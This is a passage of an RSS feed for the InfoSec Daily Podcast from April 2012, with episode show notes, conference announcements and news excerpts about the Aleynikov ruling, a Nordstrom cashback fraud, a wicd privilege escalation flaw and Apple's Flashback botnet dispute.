<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The court suggested it might have reached a different conclusion if Aleynikov had smuggled the source code out of the building on a CD or thumb drive. But because he uploaded the source code via the Internet, it could not be described as &quot;goods, wares,&quot; or &quot;merchandise.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As for the EEA, it prohibits stealing trade secrets that are &quot;related to or included in a product that is produced for or placed in interstate or foreign commerce.&quot; Again, the lower court ruled that Aleynikov&#39;s actions met this definition, and the Second Circuit disagreed.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Goldman&#39;s HFT system was strictly for the firm&#39;s internal use. It had not sold or licensed it to anyone else, nor did it intend to do so. According to the Second Circuit, this meant that the HFT system was not &quot;produced for&quot; or &quot;placed in&quot; interstate commerce. And so stealing its source code wasn&#39;t a crime under the EEA.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.securityweek.com/brothers-who-attacked-nordstroms-ecommerce-system-jail-time"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securityweek.com/brothers-who-attacked-nordstroms-ecommerce-system-jail-time</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Two brothers who used a combination of fraudulent actions and business logic attacks against Nordstrom&rsquo;s e-commerce system and defrauded the retail giant out of $1.4 million via commissions and rebates are now facing jail time.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the U.S. Attorney&rsquo;s office, brothers Andrew S. Chiu, 29, of Anaheim, California; and Allen J. Chiu, 37, of Dallas, Texas, both pleaded guilty on Monday in U.S. District Court in Seattle, in connection with their scheme to defraud Nordstrom.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S. Attorney&rsquo;s office explained that the brothers devised a scheme to defraud Nordstrom after already being barred from placing orders in 2008 at the Nordstrom.com website because of excessive claims for refunds after saying merchandise had never been delivered.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to court records, the brothers were members of FatWallet.com, an online coupon and shopping site that often offers cash back incentives for purchases, and paid cash back rewards to the Chiu brothers for purchases made on several sites, including Nordstrom.com.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In January 2010, the brothers found a way to exploit a flaw in Nordstrom&rsquo;s online ordering system, by placing orders that would ultimately be blocked by Nordstrom, with no merchandise being shipped or charges being made to their credit card. However, Nordstrom unknowingly continued to compensate FatWallet for the order, and the brothers received the cash back credit from FatWallet.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In total, the U.S. Attorney&rsquo;s office said that from January 2010 through October 2011, the Chiu brothers placed a whopping $23 million in fraudulent orders through Nordstrom.com, resulting in Nordstrom paying $1.4 million in rebates and commissions to the fraudsters. More $650,000 in fraudulent cash back payments were made directly to the brothers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nordstrom has since fixed error that permitted the fraudulent activity.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the U.S. Attorney&rsquo;s office did not provide technical details on how the brothers executed the fraud, this appears to be a business logic attack rather than a typical server breach or system hack. Business logic attacks abuse the functionality of a program, as opposed to an application vulnerability which is common for many attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;As the former Director of Information Security for Sears, I can tell you with confidence that this type of criminal activity is definitely related to a business logic flaw with the system,&rdquo; said Demetrios Lazarikos, Director of Strategy at Silver Tail Systems and former head of Information Security for the Sears Online Business Unit.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Unfortunately, we are seeing an increase with cyber criminals taking advantage of different rebate programs, gift cards, and incentive/sweepstakes programs. Having visibility into the entire Web session of users&#39; activities will assist organizations in identifying this type of behavior,&quot; Lazarikos added.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-644-wicd-flaw-procurve-malware-cabincr3w-arrest-trick-mi6-phone-hack-flashback-decrease-goldman-sachs-source-code-and-nordstrom-hackers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3762/0/infosec-daily-podcast-episode-644.mp3" length="21090307" type="audio/mpeg" />
		<itunes:duration>0:43:53</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 644 for April 12, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.oute[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 644 for April 12, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://threatpost.com/en_us/blogs/critical-flaw-found-security-pros-favorite-backtrack-linux-041112
A critical security flaw has been identified in the latest version of the wicd that is found in many Linux distributions including BackTrack R2.
The previously undiscovered privilege escalation hole was disclosed in a post on the Web site of the Infosec Institute. It was discovered by a student taking part in an InfoSec Instutite Ethical Hacking class, according to the post.
&#34;The student in our ethical hacking class that found the 0day was using backtrack and decided to fuzz the program, as well as look through the source code,&#34; wrote Jack Koziol, the Security Program Manager at the InfoSec Institute. &#34;He found that he could overwrite config settings and gain a root shell.&#34;
The security flaw was discovered in a component known as the Wireless Interface Connection Daemon (or WICD). The latest version of Backtrack wicd does a poor job &#34;sanitizing&#34; (or filtering) inputs to the WICD DBUS (Desktop Bus) interface &#8211; a component that allows different applications to communicate with each other. That means that attackers can push invalid configuration options to DBUS, which are then written to a WICD wireless settings configuration file. The improper settings could include scripts or executables that would be run when certain events occur &#8211; such as the user connecting to a wireless network, according to the post, whose author asked to remain anonymous.
The wicd team has released a new version that fixes this bug (CVE-2012-2095). The title of this advisory upon release was &#34;wicd Privilege Escalation 0Day Tested against Backtrack 5, 5 R2, Arch distributions&#34;. Unfortunately, when the InfoSec Institute tweeted and emailed to mailing lists the notifications of this vulnerability, they incorrectly shortened the title and called it &#34;Backtrack 5 R2 priv escalation 0day &#34;, which was quite misleading and lead people to believe the bu[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 643 &#8211; @PentestLessons, Apple Snub, Flashback Tool, e-Book Price Fixing, Boeing, th3raptor, and MS 0-day</title>
		<link>http://www.isdpodcast.com/episode-643-pentestlessons-apple-snub-flashback-tool-e-book-price-fixing-boeing-th3raptor-and-ms-0-day</link>
		<comments>http://www.isdpodcast.com/episode-643-pentestlessons-apple-snub-flashback-tool-e-book-price-fixing-boeing-th3raptor-and-ms-0-day#comments</comments>
		<pubDate>Thu, 12 Apr 2012 00:43:37 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3757</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 643 for April 11, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 643 for April 11, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.forbes.com/sites/andygreenberg/2012/04/09/apple-snubs-firm-who-discovered-mac-botnet-tries-to-cut-off-its-server-monitoring-infections/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/andygreenberg/2012/04/09/apple-snubs-firm-who-discovered-mac-botnet-tries-to-cut-off-its-server-monitoring-infections/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Until it was revealed last week that more than half a million Macs were infected with Flashback malware, Apple had little experience working with the community of security researchers who aim to dissect and shut down botnets. &nbsp;And according to the firm that discovered this new outbreak, it could use a lesson in teamwork.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Boris Sharov, chief executive of the Moscow-based security Dr. Web says he learned Monday from the Russian Web registrar Reggi.ru that Apple had requested the registrar shut down one of its domains, which Apple said was being used as a &ldquo;command and control&rdquo; server for the hundreds of thousands of PCs infected with Flashback. In fact, that domain was one of three that Dr. Web has been using as a spoofed command and control server&ndash;what researchers call a &ldquo;sinkhole&rdquo;&ndash;to monitor the collection of hijacked machines and try to understand their behavior, the technique which allowed the firm to first report the size of Apple&rsquo;s botnet last week.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;They told the registrar this [domain] is involved in a malicious scheme. Which would be true if we weren&rsquo;t the ones controlling it and not doing any harm to users,&rdquo; says Sharov. &ldquo;This seems to mean that Apple is not considering our work as a help. It&rsquo;s just annoying them.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sharov believes that Apple&rsquo;s attempt to shut down its monitoring server was an honest mistake. But it&rsquo;s a symptom of the company&rsquo;s typically tight-lipped attitude. In fact, Sharov says that since Dr. Web first contacted Apple to share its findings about the unprecedented Mac-based botnet, it hasn&rsquo;t received a response. &ldquo;We&rsquo;ve given them all the data we have,&rdquo; he says. &ldquo;We&rsquo;ve heard nothing from them until this.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In Apple&rsquo;s defense, it may not have recognized Dr. Web as a credible security firm when the company contacted Apple earlier this month&ndash;I hadn&rsquo;t heard of the firm either until its discovery and analysis of the Flashback botnet. But the better-known security firm Kaspersky confirmed Dr. Web&rsquo;s findings on Friday. A Kaspersky representative said it hadn&rsquo;t contacted Apple with its findings and hadn&rsquo;t had any direct communication with Apple, and Kaspersky researcher Kurt Baumgartner wrote in a statement that &ldquo;from what we&rsquo;ve seen, Apple is taking appropriate action by working with the larger internet security community to shut down the Flashfake [also known as Flashback] C2 domains. Apple works vigorously to protect its brand and wants to rectify this.&rdquo; Kaspersky wouldn&rsquo;t offer more details on how Apple is working with the security community.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/apple/3350213/apples-new-flashback-killer-tool"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/apple/3350213/apples-new-flashback-killer-tool</span></a></p>
